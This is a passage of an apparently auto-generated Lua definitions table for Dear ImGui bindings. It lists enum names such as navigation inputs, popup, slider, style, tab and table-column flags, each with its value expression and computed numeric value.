defs["enums"]["ImGuiNavInput_"][2] = {}
defs["enums"]["ImGuiNavInput_"][2]["calc_value"] = 1
defs["enums"]["ImGuiNavInput_"][2]["name"] = "ImGuiNavInput_Cancel"
defs["enums"]["ImGuiNavInput_"][2]["value"] = "1"
defs["enums"]["ImGuiNavInput_"][3] = {}
defs["enums"]["ImGuiNavInput_"][3]["calc_value"] = 2
defs["enums"]["ImGuiNavInput_"][3]["name"] = "ImGuiNavInput_Input"
defs["enums"]["ImGuiNavInput_"][3]["value"] = "2"
defs["enums"]["ImGuiNavInput_"][4] = {}
defs["enums"]["ImGuiNavInput_"][4]["calc_value"] = 3
defs["enums"]["ImGuiNavInput_"][4]["name"] = "ImGuiNavInput_Menu"
defs["enums"]["ImGuiNavInput_"][4]["value"] = "3"
defs["enums"]["ImGuiNavInput_"][5] = {}
defs["enums"]["ImGuiNavInput_"][5]["calc_value"] = 4
defs["enums"]["ImGuiNavInput_"][5]["name"] = "ImGuiNavInput_DpadLeft"
defs["enums"]["ImGuiNavInput_"][5]["value"] = "4"
defs["enums"]["ImGuiNavInput_"][6] = {}
defs["enums"]["ImGuiNavInput_"][6]["calc_value"] = 5
defs["enums"]["ImGuiNavInput_"][6]["name"] = "ImGuiNavInput_DpadRight"
defs["enums"]["ImGuiNavInput_"][6]["value"] = "5"
defs["enums"]["ImGuiNavInput_"][7] = {}
defs["enums"]["ImGuiNavInput_"][7]["calc_value"] = 6
defs["enums"]["ImGuiNavInput_"][7]["name"] = "ImGuiNavInput_DpadUp"
defs["enums"]["ImGuiNavInput_"][7]["value"] = "6"
defs["enums"]["ImGuiNavInput_"][8] = {}
defs["enums"]["ImGuiNavInput_"][8]["calc_value"] = 7
defs["enums"]["ImGuiNavInput_"][8]["name"] = "ImGuiNavInput_DpadDown"
defs["enums"]["ImGuiNavInput_"][8]["value"] = "7"
defs["enums"]["ImGuiNavInput_"][9] = {}
defs["enums"]["ImGuiNavInput_"][9]["calc_value"] = 8
defs["enums"]["ImGuiNavInput_"][9]["name"] = "ImGuiNavInput_LStickLeft"
defs["enums"]["ImGuiNavInput_"][9]["value"] = "8"
defs["enums"]["ImGuiNavInput_"][10] = {}
defs["enums"]["ImGuiNavInput_"][10]["calc_value"] = 9
defs["enums"]["ImGuiNavInput_"][10]["name"] = "ImGuiNavInput_LStickRight"
defs["enums"]["ImGuiNavInput_"][10]["value"] = "9"
defs["enums"]["ImGuiNavInput_"][11] = {}
defs["enums"]["ImGuiNavInput_"][11]["calc_value"] = 10
defs["enums"]["ImGuiNavInput_"][11]["name"] = "ImGuiNavInput_LStickUp"
defs["enums"]["ImGuiNavInput_"][11]["value"] = "10"
defs["enums"]["ImGuiNavInput_"][12] = {}
defs["enums"]["ImGuiNavInput_"][12]["calc_value"] = 11
defs["enums"]["ImGuiNavInput_"][12]["name"] = "ImGuiNavInput_LStickDown"
defs["enums"]["ImGuiNavInput_"][12]["value"] = "11"
defs["enums"]["ImGuiNavInput_"][13] = {}
defs["enums"]["ImGuiNavInput_"][13]["calc_value"] = 12
defs["enums"]["ImGuiNavInput_"][13]["name"] = "ImGuiNavInput_FocusPrev"
defs["enums"]["ImGuiNavInput_"][13]["value"] = "12"
defs["enums"]["ImGuiNavInput_"][14] = {}
defs["enums"]["ImGuiNavInput_"][14]["calc_value"] = 13
defs["enums"]["ImGuiNavInput_"][14]["name"] = "ImGuiNavInput_FocusNext"
defs["enums"]["ImGuiNavInput_"][14]["value"] = "13"
defs["enums"]["ImGuiNavInput_"][15] = {}
defs["enums"]["ImGuiNavInput_"][15]["calc_value"] = 14
defs["enums"]["ImGuiNavInput_"][15]["name"] = "ImGuiNavInput_TweakSlow"
defs["enums"]["ImGuiNavInput_"][15]["value"] = "14"
defs["enums"]["ImGuiNavInput_"][16] = {}
defs["enums"]["ImGuiNavInput_"][16]["calc_value"] = 15
defs["enums"]["ImGuiNavInput_"][16]["name"] = "ImGuiNavInput_TweakFast"
defs["enums"]["ImGuiNavInput_"][16]["value"] = "15"
defs["enums"]["ImGuiNavInput_"][17] = {}
defs["enums"]["ImGuiNavInput_"][17]["calc_value"] = 16
defs["enums"]["ImGuiNavInput_"][17]["name"] = "ImGuiNavInput_KeyMenu_"
defs["enums"]["ImGuiNavInput_"][17]["value"] = "16"
defs["enums"]["ImGuiNavInput_"][18] = {}
defs["enums"]["ImGuiNavInput_"][18]["calc_value"] = 17
defs["enums"]["ImGuiNavInput_"][18]["name"] = "ImGuiNavInput_KeyLeft_"
defs["enums"]["ImGuiNavInput_"][18]["value"] = "17"
defs["enums"]["ImGuiNavInput_"][19] = {}
defs["enums"]["ImGuiNavInput_"][19]["calc_value"] = 18
defs["enums"]["ImGuiNavInput_"][19]["name"] = "ImGuiNavInput_KeyRight_"
defs["enums"]["ImGuiNavInput_"][19]["value"] = "18"
defs["enums"]["ImGuiNavInput_"][20] = {}
defs["enums"]["ImGuiNavInput_"][20]["calc_value"] = 19
defs["enums"]["ImGuiNavInput_"][20]["name"] = "ImGuiNavInput_KeyUp_"
defs["enums"]["ImGuiNavInput_"][20]["value"] = "19"
defs["enums"]["ImGuiNavInput_"][21] = {}
defs["enums"]["ImGuiNavInput_"][21]["calc_value"] = 20
defs["enums"]["ImGuiNavInput_"][21]["name"] = "ImGuiNavInput_KeyDown_"
defs["enums"]["ImGuiNavInput_"][21]["value"] = "20"
defs["enums"]["ImGuiNavInput_"][22] = {}
defs["enums"]["ImGuiNavInput_"][22]["calc_value"] = 21
defs["enums"]["ImGuiNavInput_"][22]["name"] = "ImGuiNavInput_COUNT"
defs["enums"]["ImGuiNavInput_"][22]["value"] = "21"
defs["enums"]["ImGuiNavInput_"][23] = {}
defs["enums"]["ImGuiNavInput_"][23]["calc_value"] = 16
defs["enums"]["ImGuiNavInput_"][23]["name"] = "ImGuiNavInput_InternalStart_"
defs["enums"]["ImGuiNavInput_"][23]["value"] = "ImGuiNavInput_KeyMenu_"
defs["enums"]["ImGuiPopupFlags_"] = {}
defs["enums"]["ImGuiPopupFlags_"][1] = {}
defs["enums"]["ImGuiPopupFlags_"][1]["calc_value"] = 0
defs["enums"]["ImGuiPopupFlags_"][1]["name"] = "ImGuiPopupFlags_None"
defs["enums"]["ImGuiPopupFlags_"][1]["value"] = "0"
defs["enums"]["ImGuiPopupFlags_"][2] = {}
defs["enums"]["ImGuiPopupFlags_"][2]["calc_value"] = 0
defs["enums"]["ImGuiPopupFlags_"][2]["name"] = "ImGuiPopupFlags_MouseButtonLeft"
defs["enums"]["ImGuiPopupFlags_"][2]["value"] = "0"
defs["enums"]["ImGuiPopupFlags_"][3] = {}
defs["enums"]["ImGuiPopupFlags_"][3]["calc_value"] = 1
defs["enums"]["ImGuiPopupFlags_"][3]["name"] = "ImGuiPopupFlags_MouseButtonRight"
defs["enums"]["ImGuiPopupFlags_"][3]["value"] = "1"
defs["enums"]["ImGuiPopupFlags_"][4] = {}
defs["enums"]["ImGuiPopupFlags_"][4]["calc_value"] = 2
defs["enums"]["ImGuiPopupFlags_"][4]["name"] = "ImGuiPopupFlags_MouseButtonMiddle"
defs["enums"]["ImGuiPopupFlags_"][4]["value"] = "2"
defs["enums"]["ImGuiPopupFlags_"][5] = {}
defs["enums"]["ImGuiPopupFlags_"][5]["calc_value"] = 31
defs["enums"]["ImGuiPopupFlags_"][5]["name"] = "ImGuiPopupFlags_MouseButtonMask_"
defs["enums"]["ImGuiPopupFlags_"][5]["value"] = "0x1F"
defs["enums"]["ImGuiPopupFlags_"][6] = {}
defs["enums"]["ImGuiPopupFlags_"][6]["calc_value"] = 1
defs["enums"]["ImGuiPopupFlags_"][6]["name"] = "ImGuiPopupFlags_MouseButtonDefault_"
defs["enums"]["ImGuiPopupFlags_"][6]["value"] = "1"
defs["enums"]["ImGuiPopupFlags_"][7] = {}
defs["enums"]["ImGuiPopupFlags_"][7]["calc_value"] = 32
defs["enums"]["ImGuiPopupFlags_"][7]["name"] = "ImGuiPopupFlags_NoOpenOverExistingPopup"
defs["enums"]["ImGuiPopupFlags_"][7]["value"] = "1 << 5"
defs["enums"]["ImGuiPopupFlags_"][8] = {}
defs["enums"]["ImGuiPopupFlags_"][8]["calc_value"] = 64
defs["enums"]["ImGuiPopupFlags_"][8]["name"] = "ImGuiPopupFlags_NoOpenOverItems"
defs["enums"]["ImGuiPopupFlags_"][8]["value"] = "1 << 6"
defs["enums"]["ImGuiPopupFlags_"][9] = {}
defs["enums"]["ImGuiPopupFlags_"][9]["calc_value"] = 128
defs["enums"]["ImGuiPopupFlags_"][9]["name"] = "ImGuiPopupFlags_AnyPopupId"
defs["enums"]["ImGuiPopupFlags_"][9]["value"] = "1 << 7"
defs["enums"]["ImGuiPopupFlags_"][10] = {}
defs["enums"]["ImGuiPopupFlags_"][10]["calc_value"] = 256
defs["enums"]["ImGuiPopupFlags_"][10]["name"] = "ImGuiPopupFlags_AnyPopupLevel"
defs["enums"]["ImGuiPopupFlags_"][10]["value"] = "1 << 8"
defs["enums"]["ImGuiPopupFlags_"][11] = {}
defs["enums"]["ImGuiPopupFlags_"][11]["calc_value"] = 384
defs["enums"]["ImGuiPopupFlags_"][11]["name"] = "ImGuiPopupFlags_AnyPopup"
defs["enums"]["ImGuiPopupFlags_"][11]["value"] = "ImGuiPopupFlags_AnyPopupId | ImGuiPopupFlags_AnyPopupLevel"
defs["enums"]["ImGuiSelectableFlags_"] = {}
defs["enums"]["ImGuiSelectableFlags_"][1] = {}
defs["enums"]["ImGuiSelectableFlags_"][1]["calc_value"] = 0
defs["enums"]["ImGuiSelectableFlags_"][1]["name"] = "ImGuiSelectableFlags_None"
defs["enums"]["ImGuiSelectableFlags_"][1]["value"] = "0"
defs["enums"]["ImGuiSelectableFlags_"][2] = {}
defs["enums"]["ImGuiSelectableFlags_"][2]["calc_value"] = 1
defs["enums"]["ImGuiSelectableFlags_"][2]["name"] = "ImGuiSelectableFlags_DontClosePopups"
defs["enums"]["ImGuiSelectableFlags_"][2]["value"] = "1 << 0"
defs["enums"]["ImGuiSelectableFlags_"][3] = {}
defs["enums"]["ImGuiSelectableFlags_"][3]["calc_value"] = 2
defs["enums"]["ImGuiSelectableFlags_"][3]["name"] = "ImGuiSelectableFlags_SpanAllColumns"
defs["enums"]["ImGuiSelectableFlags_"][3]["value"] = "1 << 1"
defs["enums"]["ImGuiSelectableFlags_"][4] = {}
defs["enums"]["ImGuiSelectableFlags_"][4]["calc_value"] = 4
defs["enums"]["ImGuiSelectableFlags_"][4]["name"] = "ImGuiSelectableFlags_AllowDoubleClick"
defs["enums"]["ImGuiSelectableFlags_"][4]["value"] = "1 << 2"
defs["enums"]["ImGuiSelectableFlags_"][5] = {}
defs["enums"]["ImGuiSelectableFlags_"][5]["calc_value"] = 8
defs["enums"]["ImGuiSelectableFlags_"][5]["name"] = "ImGuiSelectableFlags_Disabled"
defs["enums"]["ImGuiSelectableFlags_"][5]["value"] = "1 << 3"
defs["enums"]["ImGuiSelectableFlags_"][6] = {}
defs["enums"]["ImGuiSelectableFlags_"][6]["calc_value"] = 16
defs["enums"]["ImGuiSelectableFlags_"][6]["name"] = "ImGuiSelectableFlags_AllowItemOverlap"
defs["enums"]["ImGuiSelectableFlags_"][6]["value"] = "1 << 4"
defs["enums"]["ImGuiSliderFlags_"] = {}
defs["enums"]["ImGuiSliderFlags_"][1] = {}
defs["enums"]["ImGuiSliderFlags_"][1]["calc_value"] = 0
defs["enums"]["ImGuiSliderFlags_"][1]["name"] = "ImGuiSliderFlags_None"
defs["enums"]["ImGuiSliderFlags_"][1]["value"] = "0"
defs["enums"]["ImGuiSliderFlags_"][2] = {}
defs["enums"]["ImGuiSliderFlags_"][2]["calc_value"] = 16
defs["enums"]["ImGuiSliderFlags_"][2]["name"] = "ImGuiSliderFlags_AlwaysClamp"
defs["enums"]["ImGuiSliderFlags_"][2]["value"] = "1 << 4"
defs["enums"]["ImGuiSliderFlags_"][3] = {}
defs["enums"]["ImGuiSliderFlags_"][3]["calc_value"] = 32
defs["enums"]["ImGuiSliderFlags_"][3]["name"] = "ImGuiSliderFlags_Logarithmic"
defs["enums"]["ImGuiSliderFlags_"][3]["value"] = "1 << 5"
defs["enums"]["ImGuiSliderFlags_"][4] = {}
defs["enums"]["ImGuiSliderFlags_"][4]["calc_value"] = 64
defs["enums"]["ImGuiSliderFlags_"][4]["name"] = "ImGuiSliderFlags_NoRoundToFormat"
defs["enums"]["ImGuiSliderFlags_"][4]["value"] = "1 << 6"
defs["enums"]["ImGuiSliderFlags_"][5] = {}
defs["enums"]["ImGuiSliderFlags_"][5]["calc_value"] = 128
defs["enums"]["ImGuiSliderFlags_"][5]["name"] = "ImGuiSliderFlags_NoInput"
defs["enums"]["ImGuiSliderFlags_"][5]["value"] = "1 << 7"
defs["enums"]["ImGuiSliderFlags_"][6] = {}
defs["enums"]["ImGuiSliderFlags_"][6]["calc_value"] = 1879048207
defs["enums"]["ImGuiSliderFlags_"][6]["name"] = "ImGuiSliderFlags_InvalidMask_"
defs["enums"]["ImGuiSliderFlags_"][6]["value"] = "0x7000000F"
defs["enums"]["ImGuiSortDirection_"] = {}
defs["enums"]["ImGuiSortDirection_"][1] = {}
defs["enums"]["ImGuiSortDirection_"][1]["calc_value"] = 0
defs["enums"]["ImGuiSortDirection_"][1]["name"] = "ImGuiSortDirection_None"
defs["enums"]["ImGuiSortDirection_"][1]["value"] = "0"
defs["enums"]["ImGuiSortDirection_"][2] = {}
defs["enums"]["ImGuiSortDirection_"][2]["calc_value"] = 1
defs["enums"]["ImGuiSortDirection_"][2]["name"] = "ImGuiSortDirection_Ascending"
defs["enums"]["ImGuiSortDirection_"][2]["value"] = "1"
defs["enums"]["ImGuiSortDirection_"][3] = {}
defs["enums"]["ImGuiSortDirection_"][3]["calc_value"] = 2
defs["enums"]["ImGuiSortDirection_"][3]["name"] = "ImGuiSortDirection_Descending"
defs["enums"]["ImGuiSortDirection_"][3]["value"] = "2"
defs["enums"]["ImGuiStyleVar_"] = {}
defs["enums"]["ImGuiStyleVar_"][1] = {}
defs["enums"]["ImGuiStyleVar_"][1]["calc_value"] = 0
defs["enums"]["ImGuiStyleVar_"][1]["name"] = "ImGuiStyleVar_Alpha"
defs["enums"]["ImGuiStyleVar_"][1]["value"] = "0"
defs["enums"]["ImGuiStyleVar_"][2] = {}
defs["enums"]["ImGuiStyleVar_"][2]["calc_value"] = 1
defs["enums"]["ImGuiStyleVar_"][2]["name"] = "ImGuiStyleVar_WindowPadding"
defs["enums"]["ImGuiStyleVar_"][2]["value"] = "1"
defs["enums"]["ImGuiStyleVar_"][3] = {}
defs["enums"]["ImGuiStyleVar_"][3]["calc_value"] = 2
defs["enums"]["ImGuiStyleVar_"][3]["name"] = "ImGuiStyleVar_WindowRounding"
defs["enums"]["ImGuiStyleVar_"][3]["value"] = "2"
defs["enums"]["ImGuiStyleVar_"][4] = {}
defs["enums"]["ImGuiStyleVar_"][4]["calc_value"] = 3
defs["enums"]["ImGuiStyleVar_"][4]["name"] = "ImGuiStyleVar_WindowBorderSize"
defs["enums"]["ImGuiStyleVar_"][4]["value"] = "3"
defs["enums"]["ImGuiStyleVar_"][5] = {}
defs["enums"]["ImGuiStyleVar_"][5]["calc_value"] = 4
defs["enums"]["ImGuiStyleVar_"][5]["name"] = "ImGuiStyleVar_WindowMinSize"
defs["enums"]["ImGuiStyleVar_"][5]["value"] = "4"
defs["enums"]["ImGuiStyleVar_"][6] = {}
defs["enums"]["ImGuiStyleVar_"][6]["calc_value"] = 5
defs["enums"]["ImGuiStyleVar_"][6]["name"] = "ImGuiStyleVar_WindowTitleAlign"
defs["enums"]["ImGuiStyleVar_"][6]["value"] = "5"
defs["enums"]["ImGuiStyleVar_"][7] = {}
defs["enums"]["ImGuiStyleVar_"][7]["calc_value"] = 6
defs["enums"]["ImGuiStyleVar_"][7]["name"] = "ImGuiStyleVar_ChildRounding"
defs["enums"]["ImGuiStyleVar_"][7]["value"] = "6"
defs["enums"]["ImGuiStyleVar_"][8] = {}
defs["enums"]["ImGuiStyleVar_"][8]["calc_value"] = 7
defs["enums"]["ImGuiStyleVar_"][8]["name"] = "ImGuiStyleVar_ChildBorderSize"
defs["enums"]["ImGuiStyleVar_"][8]["value"] = "7"
defs["enums"]["ImGuiStyleVar_"][9] = {}
defs["enums"]["ImGuiStyleVar_"][9]["calc_value"] = 8
defs["enums"]["ImGuiStyleVar_"][9]["name"] = "ImGuiStyleVar_PopupRounding"
defs["enums"]["ImGuiStyleVar_"][9]["value"] = "8"
defs["enums"]["ImGuiStyleVar_"][10] = {}
defs["enums"]["ImGuiStyleVar_"][10]["calc_value"] = 9
defs["enums"]["ImGuiStyleVar_"][10]["name"] = "ImGuiStyleVar_PopupBorderSize"
defs["enums"]["ImGuiStyleVar_"][10]["value"] = "9"
defs["enums"]["ImGuiStyleVar_"][11] = {}
defs["enums"]["ImGuiStyleVar_"][11]["calc_value"] = 10
defs["enums"]["ImGuiStyleVar_"][11]["name"] = "ImGuiStyleVar_FramePadding"
defs["enums"]["ImGuiStyleVar_"][11]["value"] = "10"
defs["enums"]["ImGuiStyleVar_"][12] = {}
defs["enums"]["ImGuiStyleVar_"][12]["calc_value"] = 11
defs["enums"]["ImGuiStyleVar_"][12]["name"] = "ImGuiStyleVar_FrameRounding"
defs["enums"]["ImGuiStyleVar_"][12]["value"] = "11"
defs["enums"]["ImGuiStyleVar_"][13] = {}
defs["enums"]["ImGuiStyleVar_"][13]["calc_value"] = 12
defs["enums"]["ImGuiStyleVar_"][13]["name"] = "ImGuiStyleVar_FrameBorderSize"
defs["enums"]["ImGuiStyleVar_"][13]["value"] = "12"
defs["enums"]["ImGuiStyleVar_"][14] = {}
defs["enums"]["ImGuiStyleVar_"][14]["calc_value"] = 13
defs["enums"]["ImGuiStyleVar_"][14]["name"] = "ImGuiStyleVar_ItemSpacing"
defs["enums"]["ImGuiStyleVar_"][14]["value"] = "13"
defs["enums"]["ImGuiStyleVar_"][15] = {}
defs["enums"]["ImGuiStyleVar_"][15]["calc_value"] = 14
defs["enums"]["ImGuiStyleVar_"][15]["name"] = "ImGuiStyleVar_ItemInnerSpacing"
defs["enums"]["ImGuiStyleVar_"][15]["value"] = "14"
defs["enums"]["ImGuiStyleVar_"][16] = {}
defs["enums"]["ImGuiStyleVar_"][16]["calc_value"] = 15
defs["enums"]["ImGuiStyleVar_"][16]["name"] = "ImGuiStyleVar_IndentSpacing"
defs["enums"]["ImGuiStyleVar_"][16]["value"] = "15"
defs["enums"]["ImGuiStyleVar_"][17] = {}
defs["enums"]["ImGuiStyleVar_"][17]["calc_value"] = 16
defs["enums"]["ImGuiStyleVar_"][17]["name"] = "ImGuiStyleVar_CellPadding"
defs["enums"]["ImGuiStyleVar_"][17]["value"] = "16"
defs["enums"]["ImGuiStyleVar_"][18] = {}
defs["enums"]["ImGuiStyleVar_"][18]["calc_value"] = 17
defs["enums"]["ImGuiStyleVar_"][18]["name"] = "ImGuiStyleVar_ScrollbarSize"
defs["enums"]["ImGuiStyleVar_"][18]["value"] = "17"
defs["enums"]["ImGuiStyleVar_"][19] = {}
defs["enums"]["ImGuiStyleVar_"][19]["calc_value"] = 18
defs["enums"]["ImGuiStyleVar_"][19]["name"] = "ImGuiStyleVar_ScrollbarRounding"
defs["enums"]["ImGuiStyleVar_"][19]["value"] = "18"
defs["enums"]["ImGuiStyleVar_"][20] = {}
defs["enums"]["ImGuiStyleVar_"][20]["calc_value"] = 19
defs["enums"]["ImGuiStyleVar_"][20]["name"] = "ImGuiStyleVar_GrabMinSize"
defs["enums"]["ImGuiStyleVar_"][20]["value"] = "19"
defs["enums"]["ImGuiStyleVar_"][21] = {}
defs["enums"]["ImGuiStyleVar_"][21]["calc_value"] = 20
defs["enums"]["ImGuiStyleVar_"][21]["name"] = "ImGuiStyleVar_GrabRounding"
defs["enums"]["ImGuiStyleVar_"][21]["value"] = "20"
defs["enums"]["ImGuiStyleVar_"][22] = {}
defs["enums"]["ImGuiStyleVar_"][22]["calc_value"] = 21
defs["enums"]["ImGuiStyleVar_"][22]["name"] = "ImGuiStyleVar_TabRounding"
defs["enums"]["ImGuiStyleVar_"][22]["value"] = "21"
defs["enums"]["ImGuiStyleVar_"][23] = {}
defs["enums"]["ImGuiStyleVar_"][23]["calc_value"] = 22
defs["enums"]["ImGuiStyleVar_"][23]["name"] = "ImGuiStyleVar_ButtonTextAlign"
defs["enums"]["ImGuiStyleVar_"][23]["value"] = "22"
defs["enums"]["ImGuiStyleVar_"][24] = {}
defs["enums"]["ImGuiStyleVar_"][24]["calc_value"] = 23
defs["enums"]["ImGuiStyleVar_"][24]["name"] = "ImGuiStyleVar_SelectableTextAlign"
defs["enums"]["ImGuiStyleVar_"][24]["value"] = "23"
defs["enums"]["ImGuiStyleVar_"][25] = {}
defs["enums"]["ImGuiStyleVar_"][25]["calc_value"] = 24
defs["enums"]["ImGuiStyleVar_"][25]["name"] = "ImGuiStyleVar_COUNT"
defs["enums"]["ImGuiStyleVar_"][25]["value"] = "24"
defs["enums"]["ImGuiTabBarFlags_"] = {}
defs["enums"]["ImGuiTabBarFlags_"][1] = {}
defs["enums"]["ImGuiTabBarFlags_"][1]["calc_value"] = 0
defs["enums"]["ImGuiTabBarFlags_"][1]["name"] = "ImGuiTabBarFlags_None"
defs["enums"]["ImGuiTabBarFlags_"][1]["value"] = "0"
defs["enums"]["ImGuiTabBarFlags_"][2] = {}
defs["enums"]["ImGuiTabBarFlags_"][2]["calc_value"] = 1
defs["enums"]["ImGuiTabBarFlags_"][2]["name"] = "ImGuiTabBarFlags_Reorderable"
defs["enums"]["ImGuiTabBarFlags_"][2]["value"] = "1 << 0"
defs["enums"]["ImGuiTabBarFlags_"][3] = {}
defs["enums"]["ImGuiTabBarFlags_"][3]["calc_value"] = 2
defs["enums"]["ImGuiTabBarFlags_"][3]["name"] = "ImGuiTabBarFlags_AutoSelectNewTabs"
defs["enums"]["ImGuiTabBarFlags_"][3]["value"] = "1 << 1"
defs["enums"]["ImGuiTabBarFlags_"][4] = {}
defs["enums"]["ImGuiTabBarFlags_"][4]["calc_value"] = 4
defs["enums"]["ImGuiTabBarFlags_"][4]["name"] = "ImGuiTabBarFlags_TabListPopupButton"
defs["enums"]["ImGuiTabBarFlags_"][4]["value"] = "1 << 2"
defs["enums"]["ImGuiTabBarFlags_"][5] = {}
defs["enums"]["ImGuiTabBarFlags_"][5]["calc_value"] = 8
defs["enums"]["ImGuiTabBarFlags_"][5]["name"] = "ImGuiTabBarFlags_NoCloseWithMiddleMouseButton"
defs["enums"]["ImGuiTabBarFlags_"][5]["value"] = "1 << 3"
defs["enums"]["ImGuiTabBarFlags_"][6] = {}
defs["enums"]["ImGuiTabBarFlags_"][6]["calc_value"] = 16
defs["enums"]["ImGuiTabBarFlags_"][6]["name"] = "ImGuiTabBarFlags_NoTabListScrollingButtons"
defs["enums"]["ImGuiTabBarFlags_"][6]["value"] = "1 << 4"
defs["enums"]["ImGuiTabBarFlags_"][7] = {}
defs["enums"]["ImGuiTabBarFlags_"][7]["calc_value"] = 32
defs["enums"]["ImGuiTabBarFlags_"][7]["name"] = "ImGuiTabBarFlags_NoTooltip"
defs["enums"]["ImGuiTabBarFlags_"][7]["value"] = "1 << 5"
defs["enums"]["ImGuiTabBarFlags_"][8] = {}
defs["enums"]["ImGuiTabBarFlags_"][8]["calc_value"] = 64
defs["enums"]["ImGuiTabBarFlags_"][8]["name"] = "ImGuiTabBarFlags_FittingPolicyResizeDown"
defs["enums"]["ImGuiTabBarFlags_"][8]["value"] = "1 << 6"
defs["enums"]["ImGuiTabBarFlags_"][9] = {}
defs["enums"]["ImGuiTabBarFlags_"][9]["calc_value"] = 128
defs["enums"]["ImGuiTabBarFlags_"][9]["name"] = "ImGuiTabBarFlags_FittingPolicyScroll"
defs["enums"]["ImGuiTabBarFlags_"][9]["value"] = "1 << 7"
defs["enums"]["ImGuiTabBarFlags_"][10] = {}
defs["enums"]["ImGuiTabBarFlags_"][10]["calc_value"] = 192
defs["enums"]["ImGuiTabBarFlags_"][10]["name"] = "ImGuiTabBarFlags_FittingPolicyMask_"
defs["enums"]["ImGuiTabBarFlags_"][10]["value"] = "ImGuiTabBarFlags_FittingPolicyResizeDown | ImGuiTabBarFlags_FittingPolicyScroll"
defs["enums"]["ImGuiTabBarFlags_"][11] = {}
defs["enums"]["ImGuiTabBarFlags_"][11]["calc_value"] = 64
defs["enums"]["ImGuiTabBarFlags_"][11]["name"] = "ImGuiTabBarFlags_FittingPolicyDefault_"
defs["enums"]["ImGuiTabBarFlags_"][11]["value"] = "ImGuiTabBarFlags_FittingPolicyResizeDown"
defs["enums"]["ImGuiTabItemFlags_"] = {}
defs["enums"]["ImGuiTabItemFlags_"][1] = {}
defs["enums"]["ImGuiTabItemFlags_"][1]["calc_value"] = 0
defs["enums"]["ImGuiTabItemFlags_"][1]["name"] = "ImGuiTabItemFlags_None"
defs["enums"]["ImGuiTabItemFlags_"][1]["value"] = "0"
defs["enums"]["ImGuiTabItemFlags_"][2] = {}
defs["enums"]["ImGuiTabItemFlags_"][2]["calc_value"] = 1
defs["enums"]["ImGuiTabItemFlags_"][2]["name"] = "ImGuiTabItemFlags_UnsavedDocument"
defs["enums"]["ImGuiTabItemFlags_"][2]["value"] = "1 << 0"
defs["enums"]["ImGuiTabItemFlags_"][3] = {}
defs["enums"]["ImGuiTabItemFlags_"][3]["calc_value"] = 2
defs["enums"]["ImGuiTabItemFlags_"][3]["name"] = "ImGuiTabItemFlags_SetSelected"
defs["enums"]["ImGuiTabItemFlags_"][3]["value"] = "1 << 1"
defs["enums"]["ImGuiTabItemFlags_"][4] = {}
defs["enums"]["ImGuiTabItemFlags_"][4]["calc_value"] = 4
defs["enums"]["ImGuiTabItemFlags_"][4]["name"] = "ImGuiTabItemFlags_NoCloseWithMiddleMouseButton"
defs["enums"]["ImGuiTabItemFlags_"][4]["value"] = "1 << 2"
defs["enums"]["ImGuiTabItemFlags_"][5] = {}
defs["enums"]["ImGuiTabItemFlags_"][5]["calc_value"] = 8
defs["enums"]["ImGuiTabItemFlags_"][5]["name"] = "ImGuiTabItemFlags_NoPushId"
defs["enums"]["ImGuiTabItemFlags_"][5]["value"] = "1 << 3"
defs["enums"]["ImGuiTabItemFlags_"][6] = {}
defs["enums"]["ImGuiTabItemFlags_"][6]["calc_value"] = 16
defs["enums"]["ImGuiTabItemFlags_"][6]["name"] = "ImGuiTabItemFlags_NoTooltip"
defs["enums"]["ImGuiTabItemFlags_"][6]["value"] = "1 << 4"
defs["enums"]["ImGuiTabItemFlags_"][7] = {}
defs["enums"]["ImGuiTabItemFlags_"][7]["calc_value"] = 32
defs["enums"]["ImGuiTabItemFlags_"][7]["name"] = "ImGuiTabItemFlags_NoReorder"
defs["enums"]["ImGuiTabItemFlags_"][7]["value"] = "1 << 5"
defs["enums"]["ImGuiTabItemFlags_"][8] = {}
defs["enums"]["ImGuiTabItemFlags_"][8]["calc_value"] = 64
defs["enums"]["ImGuiTabItemFlags_"][8]["name"] = "ImGuiTabItemFlags_Leading"
defs["enums"]["ImGuiTabItemFlags_"][8]["value"] = "1 << 6"
defs["enums"]["ImGuiTabItemFlags_"][9] = {}
defs["enums"]["ImGuiTabItemFlags_"][9]["calc_value"] = 128
defs["enums"]["ImGuiTabItemFlags_"][9]["name"] = "ImGuiTabItemFlags_Trailing"
defs["enums"]["ImGuiTabItemFlags_"][9]["value"] = "1 << 7"
defs["enums"]["ImGuiTableBgTarget_"] = {}
defs["enums"]["ImGuiTableBgTarget_"][1] = {}
defs["enums"]["ImGuiTableBgTarget_"][1]["calc_value"] = 0
defs["enums"]["ImGuiTableBgTarget_"][1]["name"] = "ImGuiTableBgTarget_None"
defs["enums"]["ImGuiTableBgTarget_"][1]["value"] = "0"
defs["enums"]["ImGuiTableBgTarget_"][2] = {}
defs["enums"]["ImGuiTableBgTarget_"][2]["calc_value"] = 1
defs["enums"]["ImGuiTableBgTarget_"][2]["name"] = "ImGuiTableBgTarget_RowBg0"
defs["enums"]["ImGuiTableBgTarget_"][2]["value"] = "1"
defs["enums"]["ImGuiTableBgTarget_"][3] = {}
defs["enums"]["ImGuiTableBgTarget_"][3]["calc_value"] = 2
defs["enums"]["ImGuiTableBgTarget_"][3]["name"] = "ImGuiTableBgTarget_RowBg1"
defs["enums"]["ImGuiTableBgTarget_"][3]["value"] = "2"
defs["enums"]["ImGuiTableBgTarget_"][4] = {}
defs["enums"]["ImGuiTableBgTarget_"][4]["calc_value"] = 3
defs["enums"]["ImGuiTableBgTarget_"][4]["name"] = "ImGuiTableBgTarget_CellBg"
defs["enums"]["ImGuiTableBgTarget_"][4]["value"] = "3"
defs["enums"]["ImGuiTableColumnFlags_"] = {}
defs["enums"]["ImGuiTableColumnFlags_"][1] = {}
defs["enums"]["ImGuiTableColumnFlags_"][1]["calc_value"] = 0
defs["enums"]["ImGuiTableColumnFlags_"][1]["name"] = "ImGuiTableColumnFlags_None"
defs["enums"]["ImGuiTableColumnFlags_"][1]["value"] = "0"
defs["enums"]["ImGuiTableColumnFlags_"][2] = {}
defs["enums"]["ImGuiTableColumnFlags_"][2]["calc_value"] = 1
defs["enums"]["ImGuiTableColumnFlags_"][2]["name"] = "ImGuiTableColumnFlags_DefaultHide"
defs["enums"]["ImGuiTableColumnFlags_"][2]["value"] = "1 << 0"
defs["enums"]["ImGuiTableColumnFlags_"][3] = {}
defs["enums"]["ImGuiTableColumnFlags_"][3]["calc_value"] = 2
defs["enums"]["ImGuiTableColumnFlags_"][3]["name"] = "ImGuiTableColumnFlags_DefaultSort"
defs["enums"]["ImGuiTableColumnFlags_"][3]["value"] = "1 << 1"
defs["enums"]["ImGuiTableColumnFlags_"][4] = {}
